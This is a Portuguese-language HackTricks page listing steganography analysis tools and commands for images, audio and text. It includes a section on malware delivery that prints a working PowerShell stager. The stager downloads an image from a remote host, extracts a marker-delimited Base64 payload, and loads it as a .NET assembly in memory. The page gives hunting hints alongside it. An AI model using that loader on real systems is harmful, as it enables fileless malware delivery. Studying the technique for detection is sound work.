Stego Tricks

Reading time: 9 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Extraindo dados de arquivos

Binwalk

Uma ferramenta para procurar em arquivos binários por arquivos e dados ocultos embutidos. É instalada via apt e seu código-fonte está disponível no GitHub.

bash
binwalk file # Displays the embedded data
binwalk -e file # Extracts the data
binwalk --dd ".*" file # Extracts all data

Foremost

Recupera arquivos com base em seus cabeçalhos e rodapés, útil para imagens png. Instalado via apt com seu código-fonte em GitHub.

bash
foremost -i file # Extracts data

Exiftool

Ajuda a visualizar metadados de arquivos, disponível aqui.

bash
exiftool file # Shows the metadata

Exiv2

Semelhante ao exiftool, para visualização de metadados. Instalável via apt, código-fonte em GitHub, e possui um official website.

bash
exiv2 file # Shows the metadata

Arquivo

Identifique o tipo de arquivo com o qual você está lidando.

Strings

Extrai strings legíveis de arquivos, usando várias configurações de codificação para filtrar a saída.

bash
strings -n 6 file # Extracts strings with a minimum length of 6
strings -n 6 file | head -n 20 # First 20 strings
strings -n 6 file | tail -n 20 # Last 20 strings
strings -e s -n 6 file # 7bit strings
strings -e S -n 6 file # 8bit strings
strings -e l -n 6 file # 16bit strings (little-endian)
strings -e b -n 6 file # 16bit strings (big-endian)
strings -e L -n 6 file # 32bit strings (little-endian)
strings -e B -n 6 file # 32bit strings (big-endian)

Comparison (cmp)

Útil para comparar um arquivo modificado com sua versão original encontrada online.

bash
cmp original.jpg stego.jpg -b -l

Extraindo Dados Ocultos em Texto

Dados Ocultos em Espaços

Caracteres invisíveis em espaços aparentemente vazios podem ocultar informação. Para extrair esses dados, visite https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder.

Extraindo Dados de Imagens

Identificando Detalhes da Imagem com GraphicMagick

GraphicMagick serve para determinar tipos de arquivos de imagem e identificar possíveis corrupções. Execute o comando abaixo para inspecionar uma imagem:

bash
./magick identify -verbose stego.jpg

Para tentar reparar uma imagem danificada, adicionar um comentário de metadados pode ajudar:

bash
./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg

Steghide para Ocultação de Dados

Steghide facilita esconder dados dentro de JPEG, BMP, WAV, and AU files, sendo capaz de embedar e extrair dados encriptados. A instalação é simples usando apt, e seu source code is available on GitHub.

Comandos:

  • steghide info file revela se um arquivo contém dados ocultos.
  • steghide extract -sf file [--passphrase password] extrai os dados ocultos, senha opcional.

Para extração via web, visite este site.

Ataque de força bruta com Stegcracker:

  • Para tentar quebrar a senha do Steghide, use stegcracker da seguinte forma:
bash
stegcracker <file> [<wordlist>]

zsteg para arquivos PNG e BMP

zsteg é especializado em descobrir dados ocultos em arquivos PNG e BMP. A instalação é feita via gem install zsteg, com seu código-fonte no GitHub.

Comandos:

  • zsteg -a file aplica todos os métodos de detecção em um arquivo.
  • zsteg -E file especifica um payload para extração de dados.

StegoVeritas e Stegsolve

stegoVeritas verifica metadados, realiza transformações de imagem e aplica LSB brute forcing entre outras funcionalidades. Use stegoveritas.py -h para a lista completa de opções e stegoveritas.py stego.jpg para executar todas as verificações.

Stegsolve aplica vários filtros de cor para revelar textos ou mensagens ocultas em imagens. Está disponível no GitHub.

FFT para Detecção de Conteúdo Oculto

Técnicas de Fast Fourier Transform (FFT) podem revelar conteúdo oculto em imagens. Recursos úteis incluem:

Stegpy para arquivos de áudio e imagem

Stegpy permite embutir informações em arquivos de imagem e áudio, suportando formatos como PNG, BMP, GIF, WebP e WAV. Está disponível no GitHub.

Pngcheck para Análise de Arquivos PNG

Para analisar arquivos PNG ou validar sua autenticidade, use:

bash
apt-get install pngcheck
pngcheck stego.png

Ferramentas adicionais para Image Analysis

Para exploração adicional, considere visitar:

Payloads Base64 delimitados por marcadores escondidos em imagens (malware delivery)

Commodity loaders cada vez mais escondem payloads codificados em Base64 como texto simples dentro de imagens que, de outra forma, são válidas (frequentemente GIF/PNG). Em vez do pixel-level LSB, o payload é delimitado por unique start/end marker strings embutidas no texto/metadata do arquivo. Um stager PowerShell então:

  • Faz o download da imagem via HTTP(S)
  • Localiza as marker strings (exemplos observados: <<sudo_png>> … <<sudo_odt>>)
  • Extrai o texto entre os marcadores e decodifica Base64 para bytes
  • Carrega o .NET assembly em memória e invoca um entry method conhecido (nenhum arquivo é escrito no disco)

Trecho mínimo PowerShell de carving/loading snippet

powershell
$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notas

  • Isto se enquadra no ATT&CK T1027.003 (steganography). Cadeias de marcador variam entre campanhas.
  • Hunting: escaneie imagens baixadas em busca de delimitadores conhecidos; marque PowerShell usando DownloadString seguido de FromBase64String.

Veja também exemplos de entrega via phishing e o fluxo completo de invocação in-memory aqui:

Phishing Files & Documents

Extraindo Dados de Áudios

Audio steganography oferece um método único para ocultar informações em arquivos de som. Diferentes ferramentas são utilizadas para embutir ou recuperar conteúdo oculto.

Steghide (JPEG, BMP, WAV, AU)

Steghide é uma ferramenta versátil projetada para ocultar dados em arquivos JPEG, BMP, WAV e AU. Instruções detalhadas estão disponíveis na stego tricks documentation.

Stegpy (PNG, BMP, GIF, WebP, WAV)

Esta ferramenta é compatível com vários formatos, incluindo PNG, BMP, GIF, WebP e WAV. Para mais informações, consulte Stegpy's section.

ffmpeg

ffmpeg é crucial para avaliar a integridade de arquivos de áudio, destacando informações detalhadas e identificando quaisquer discrepâncias.

bash
ffmpeg -v info -i stego.mp3 -f null -

WavSteg (WAV)

WavSteg se destaca em ocultar e extrair dados em arquivos WAV usando a técnica LSB (least significant bit). Está disponível no GitHub. Comandos incluem:

bash
python3 WavSteg.py -r -b 1 -s soundfile -o outputfile

python3 WavSteg.py -r -b 2 -s soundfile -o outputfile

Deepsound

Deepsound permite a criptografia e a detecção de informações dentro de arquivos de som usando AES-256. Pode ser baixado de the official page.

Sonic Visualizer

Uma ferramenta indispensável para inspeção visual e analítica de arquivos de áudio, Sonic Visualizer pode revelar elementos ocultos indetectáveis por outros meios. Visite o official website para mais.

DTMF Tones - Dial Tones

A detecção de tons DTMF em arquivos de áudio pode ser feita por ferramentas online como this DTMF detector e DialABC.

Outras Técnicas

Binary Length SQRT - QR Code

Dados binários cujo comprimento é um quadrado perfeito podem representar um QR code. Use este trecho para verificar:

python
import math
math.sqrt(2500) #50

Para conversão de binário para imagem, confira dcode. Para ler códigos QR, use this online barcode reader.

Tradução de Braille

Para traduzir Braille, o Branah Braille Translator é um excelente recurso.

Referências

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks